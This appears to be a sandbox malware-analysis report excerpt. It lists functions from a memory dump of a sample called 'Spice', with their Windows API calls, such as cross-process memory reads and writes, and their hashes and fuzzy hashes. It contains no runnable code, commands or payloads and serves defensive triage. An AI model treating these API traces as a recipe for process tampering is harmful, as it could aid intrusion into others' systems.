Opcode ID: 464bf2a66e1aa3dc61d52391c25874fd00bcfe309221264de9c43d9991c2769e
Instruction ID: 2a2f13de2a81e9caa5be53f5cce91f9a48e7de37439dc5874be391165beceded
Opcode Fuzzy Hash: 464bf2a66e1aa3dc61d52391c25874fd00bcfe309221264de9c43d9991c2769e
Instruction Fuzzy Hash: E001F963B441057BE60861105E42FFB739C9A60348F14502DFE0AB6342F752FE12A2E1

Uniqueness

Uniqueness Score: -1.00%

Function 00ED504E Relevance: 7.6, APIs: 5, Instructions: 56synchronizationthreadwindowCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00ED5075
__beginthreadex.LIBCMT ref: 00ED5093
MessageBoxW.USER32(?,?,?,?), ref: 00ED50A8
WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00ED50BE
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00ED50C5

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
String ID:
API String ID: 3824534824-0
Opcode ID: 29046dfc30ebf086cb5d0271906aaeed4fa578311cd5e9ddab99ce43dfcdf470
Instruction ID: 78cae69a2ca4f08e397b0c1c0e56819a33b16ca4f51660953b77e7555b1ee77f
Opcode Fuzzy Hash: 29046dfc30ebf086cb5d0271906aaeed4fa578311cd5e9ddab99ce43dfcdf470
Instruction Fuzzy Hash: 371104B290870CBBCB119BA89C04B9B7BADEB45321F14425AFC14E3390DA7189459BF1

Uniqueness

Uniqueness Score: -1.00%

Function 00EC8E20 Relevance: 7.5, APIs: 5, Instructions: 49memoryCOMMON

Download Yara Rule

APIs

GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00EC8E3C
GetLastError.KERNEL32(?,00EC8900,?,?,?), ref: 00EC8E46
GetProcessHeap.KERNEL32(00000008,?,?,00EC8900,?,?,?), ref: 00EC8E55
HeapAlloc.KERNEL32(00000000,?,00EC8900,?,?,?), ref: 00EC8E5C
GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00EC8E73

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: HeapObjectSecurityUser$AllocErrorLastProcess
String ID:
API String ID: 842720411-0
Opcode ID: d88561f2e3b1f705de78b51f3e7972cb6386614cac6f476574f4cedb410d6810
Instruction ID: c49c49d1187fb316cddcb2c43b9a0a52a02f6f93754d1b9c4e5c2053449c9523
Opcode Fuzzy Hash: d88561f2e3b1f705de78b51f3e7972cb6386614cac6f476574f4cedb410d6810
Instruction Fuzzy Hash: DD011D71601308BFDB214FA9DE48E6B7BADFF89755B100569F849D2220DE329C51DA60

Uniqueness

Uniqueness Score: -1.00%

Function 00ED57FF Relevance: 7.5, APIs: 5, Instructions: 48sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00ED581B
QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00ED5829
Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00ED5831
QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00ED583B
Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00ED5877

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: PerformanceQuery$CounterSleep$Frequency
String ID:
API String ID: 2833360925-0
Opcode ID: 6f57ced3481c912e58ef812703c314b47cc1652a42835fd24d869a78b5bb87e6
Instruction ID: bf548df03b046033baf8c75f20768b06347cbe3bab853d4b6803409aa8ac4f9e
Opcode Fuzzy Hash: 6f57ced3481c912e58ef812703c314b47cc1652a42835fd24d869a78b5bb87e6
Instruction Fuzzy Hash: D7016936C01A1DDBCF089FE4D849AEDBBB8FB08711F00556AE402B2241CF309554EBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00EC7D28 Relevance: 7.5, APIs: 5, Instructions: 48stringCOMMON

Download Yara Rule

APIs

CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00EC7C62,80070057,?,?,?,00EC8073), ref: 00EC7D45
ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00EC7C62,80070057,?,?), ref: 00EC7D60
lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00EC7C62,80070057,?,?), ref: 00EC7D6E
CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00EC7C62,80070057,?), ref: 00EC7D7E
CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00EC7C62,80070057,?,?), ref: 00EC7D8A

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: From$Prog$FreeStringTasklstrcmpi
String ID:
API String ID: 3897988419-0
Opcode ID: 7ddb5000784ff1aeab445ecd0fd3a8c1c7ad94e13e0a41efdf0fba23e117cc92
Instruction ID: 34c919882f707b58252098d809aae0bd992fad93e825999fa054e855a55e40ff
Opcode Fuzzy Hash: 7ddb5000784ff1aeab445ecd0fd3a8c1c7ad94e13e0a41efdf0fba23e117cc92
Instruction Fuzzy Hash: 6E019A72601218ABCB114F14DE04FAA7FEDFF85362F149028F84AE2210DB32ED019BA0

Uniqueness

Uniqueness Score: -1.00%

Function 00EC8CC7 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00EC8CDE
GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00EC8CE8
GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00EC8CF7
HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00EC8CFE
GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00EC8D14

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: 9515e96463dec13e0e055f00787d005f07731f6411b09fdc261cf02beddffe88
Instruction ID: 043748bded59e953283e6d515b0a5c01348909f30ae4c9c2bfc27c7b3d2912b7
Opcode Fuzzy Hash: 9515e96463dec13e0e055f00787d005f07731f6411b09fdc261cf02beddffe88
Instruction Fuzzy Hash: 5EF04F35200208AFEB210FA59E89F673FADFF49758F104529F949D6190CE619C41EB60

Uniqueness

Uniqueness Score: -1.00%

Function 00EC8D28 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00EC8D3F
GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00EC8D49
GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00EC8D58
HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00EC8D5F
GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00EC8D75

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: b87414106db5e023da1237789be373ad401b5a10e76fb1c4db9836dbbc9fa77b
Instruction ID: 37ef5a7dddc6f8d3c76c6730fbe87268cc9e57f02cb241d9e35fc812ee7dc658
Opcode Fuzzy Hash: b87414106db5e023da1237789be373ad401b5a10e76fb1c4db9836dbbc9fa77b
Instruction Fuzzy Hash: 36F03C31240308AFEB210FA5EE88F673BADFF89758F144119F94A96190CE619D41EB60

Uniqueness

Uniqueness Score: -1.00%

Function 00ECCD7C Relevance: 7.5, APIs: 5, Instructions: 41windowtimeCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003E9), ref: 00ECCD90
GetWindowTextW.USER32(00000000,?,00000100), ref: 00ECCDA7
MessageBeep.USER32(00000000), ref: 00ECCDBF
KillTimer.USER32(?,0000040A), ref: 00ECCDDB
EndDialog.USER32(?,00000001), ref: 00ECCDF5

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: BeepDialogItemKillMessageTextTimerWindow
String ID:
API String ID: 3741023627-0
Opcode ID: 53f0de6eb3a2f0e0e5ffe6c2f69a51bb16fd91c93804e7abcba63729642a85ba
Instruction ID: a119b0bf56611ea089f991ef3bbd81fcc2ba18fc6d2ed43993ccc497d2909b78
Opcode Fuzzy Hash: 53f0de6eb3a2f0e0e5ffe6c2f69a51bb16fd91c93804e7abcba63729642a85ba
Instruction Fuzzy Hash: B401A230500708ABEB215B20DD4EFA67FB8FB00705F04066DF587B10E1DFE2A9559B80

Uniqueness

Uniqueness Score: -1.00%

Function 00E7178C Relevance: 7.5, APIs: 5, Instructions: 29COMMON

Download Yara Rule

APIs

EndPath.GDI32(?), ref: 00E7179B
StrokeAndFillPath.GDI32(?,?,00EABBC9,00000000,?), ref: 00E717B7
SelectObject.GDI32(?,00000000), ref: 00E717CA
DeleteObject.GDI32 ref: 00E717DD
StrokePath.GDI32(?), ref: 00E717F8

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: Path$ObjectStroke$DeleteFillSelect
String ID:
API String ID: 2625713937-0
Opcode ID: e906b4a0a18599a2ff2d3685c29809f11f75d0ef164b0f177904533a0173355f
Instruction ID: 1478cf25d5c325aca40f0e0c5609e8316e5662a813b363c0f3a0e89c60a98b55
Opcode Fuzzy Hash: e906b4a0a18599a2ff2d3685c29809f11f75d0ef164b0f177904533a0173355f
Instruction Fuzzy Hash: F5F0C97000834CABDB256F29EC4CB5A3BA6BB01336F64C255E56D551F0CB318996FF50

Uniqueness

Uniqueness Score: -1.00%

Function 00EDC9DA Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 279comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 00EDCA75
CoCreateInstance.OLE32(00F03D3C,00000000,00000001,00F03BAC,?), ref: 00EDCA8D

Part of subcall function 00E81A36: _memmove.LIBCMT ref: 00E81A77

CoUninitialize.OLE32 ref: 00EDCCFA

Strings

.lnk, xrefs: 00EDCA09, 00EDCA31, 00EDCA3B

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: CreateInitializeInstanceUninitialize_memmove
String ID: .lnk
API String ID: 2683427295-24824748
Opcode ID: c67e87b5a088381957260b85428ca7d57cdedd91778427c3f0645f164749b0cf
Instruction ID: ae4bf557c0887c3652400a06b11130043216a546dee7711b60eeaebe9cfef399
Opcode Fuzzy Hash: c67e87b5a088381957260b85428ca7d57cdedd91778427c3f0645f164749b0cf
Instruction Fuzzy Hash: 49A13EB1104205AFD304EF64DC81EABB7ECEF94754F00895DF599A7292EB70EA09CB52

Uniqueness

Uniqueness Score: -1.00%

Function 00E7E3C6 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 265COMMON

Download Yara Rule

APIs

Part of subcall function 00E90FE6: std::exception::exception.LIBCMT ref: 00E9101C
Part of subcall function 00E90FE6: __CxxThrowException@8.LIBCMT ref: 00E91031

Part of subcall function 00E81A36: _memmove.LIBCMT ref: 00E81A77

Part of subcall function 00E81680: _memmove.LIBCMT ref: 00E816DB

__swprintf.LIBCMT ref: 00E7E598

Strings

\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00E7E431

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
API String ID: 1943609520-557222456
Opcode ID: 861150ead4648cf3bed6ae115d0f7601534b144aedb88ff6850ab7baaa7c01b0
Instruction ID: 506cf73087a9b032d8e2aaabf10c7444449074536c7dbfbd8d1e48682811d0ae
Opcode Fuzzy Hash: 861150ead4648cf3bed6ae115d0f7601534b144aedb88ff6850ab7baaa7c01b0
Instruction Fuzzy Hash: 6F918E721042019FC714FF24C895DAFB7E8EF99704F40695DF49AB72A1EA20ED45CB92

Uniqueness

Uniqueness Score: -1.00%

Function 00E9523D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 180COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 00E952CD

Part of subcall function 00EA0320: __87except.LIBCMT ref: 00EA035B

Strings

pow, xrefs: 00E952A5, 00E952C2

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: ErrorHandling__87except__start
String ID: pow
API String ID: 2905807303-2276729525
Opcode ID: c37fc286d193f2f7cfbc3c160c4850d0bf31e05288d51099c77c7fa86949753b
Instruction ID: d9b7a0d001412e6293b6f7dd8decea35f9ac2a1a07c06c49f956004583b14cef
Opcode Fuzzy Hash: c37fc286d193f2f7cfbc3c160c4850d0bf31e05288d51099c77c7fa86949753b
Instruction Fuzzy Hash: 2C519162D0960587CF12B714C95137A3BE4BB0A754F30BD58E4D1AA1F9EF349CC8AB46

Uniqueness

Uniqueness Score: -1.00%

Function 00E90654 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 163COMMON

Download Yara Rule

Strings

#, xrefs: 00E90699
+, xrefs: 00E90690

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID:
String ID: #$+
API String ID: 0-2552117581
Opcode ID: b3efc31cc174571db31c3c9356a00b64d9c6ea52a6c05027724ea079f1b30421
Instruction ID: 275e14a9afdb1f5aceb305ffd73c9ace6d65405df4198a1bef523ea2d241a8bf
Opcode Fuzzy Hash: b3efc31cc174571db31c3c9356a00b64d9c6ea52a6c05027724ea079f1b30421
Instruction Fuzzy Hash: 3D511376500246DFDF19EF68C840AFA7BA4EF55324F54205AEC95BB290D732AC43CB61

Uniqueness

Uniqueness Score: -1.00%

Function 00E7E7F7 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 161COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00E7E937
_memmove.LIBCMT ref: 00E7E9D0
_free.LIBCMT ref: 00E7E9F6
_memmove.LIBCMT ref: 00E7EAA9

Strings

#V, xrefs: 00E7E9E2

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: _memmove$_free
String ID: #V
API String ID: 2620147621-3658881132
Opcode ID: 8b063547b328f6c0e438298d494ebccaff23fb6634263e911e5908b0b0db136d
Instruction ID: 4dd56d1163238028597c41b02f499042e51c8d68c8c2f00ad1e3e880ff5768a0
Opcode Fuzzy Hash: 8b063547b328f6c0e438298d494ebccaff23fb6634263e911e5908b0b0db136d
Instruction Fuzzy Hash: D5515A716087419FDB24CF28C481B6BBBE1FF89314F44996DE999A7361EB31D801CB92

Uniqueness

Uniqueness Score: -1.00%

Function 00E8CF0C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 143COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00E8CFC2
_memmove.LIBCMT ref: 00E8D060
_memset.LIBCMT ref: 00E8D084

Strings

ERCP, xrefs: 00E8CF2D

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: _memset$_memmove
String ID: ERCP
API String ID: 2532777613-1384759551
Opcode ID: f5c8506d884530c0b08a8add021f0eeb94393afe1e17c47af7246458cdd36385
Instruction ID: eb1e8d0e913227d1d7372d7c1df4b33d02321abdfc156ee87451da6ad88954c4
Opcode Fuzzy Hash: f5c8506d884530c0b08a8add021f0eeb94393afe1e17c47af7246458cdd36385
Instruction Fuzzy Hash: AA51D2B19043099BDB24DF64C881BEABBF5EF04314F24956EE54EEB281E731D586CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00ECA3AD Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 122windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00ED1CBB: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00EC9E4E,?,?,00000034,00000800,?,00000034), ref: 00ED1CE5

SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00ECA3F7

Part of subcall function 00ED1C86: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00EC9E7D,?,?,00000800,?,00001073,00000000,?,?), ref: 00ED1CB0

Part of subcall function 00ED1BDD: GetWindowThreadProcessId.USER32(?,?), ref: 00ED1C08
Part of subcall function 00ED1BDD: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00EC9E12,00000034,?,?,00001004,00000000,00000000), ref: 00ED1C18
Part of subcall function 00ED1BDD: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00EC9E12,00000034,?,?,00001004,00000000,00000000), ref: 00ED1C2E

SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00ECA464
SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00ECA4B1

Strings

@, xrefs: 00ECA4C9

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
String ID: @
API String ID: 4150878124-2766056989
Opcode ID: 913715a9cb87423dc58be1b89f0332fce820bc5969f1e8b7249a2e6abcda6710
Instruction ID: 237996736547f9137306801228918f2524acce3eaea9c5a9016cc87f3f90468d
Opcode Fuzzy Hash: 913715a9cb87423dc58be1b89f0332fce820bc5969f1e8b7249a2e6abcda6710
Instruction Fuzzy Hash: 04416C7290021CBFCB14DBA4CD85FDEB7B8EB05304F144199FA55B7280DA716E45CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00EF79FE Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00EF7A86
SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00EF7A9A
SendMessageW.USER32(?,00001002,00000000,?), ref: 00EF7ABE

Strings

SysMonthCal32, xrefs: 00EF7A51

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: MessageSend$Window
String ID: SysMonthCal32
API String ID: 2326795674-1439706946
Opcode ID: 4c3bca6e1f6c1eb543ece8fb680c9725634055a8a0d32c7beed7a74492402c9c
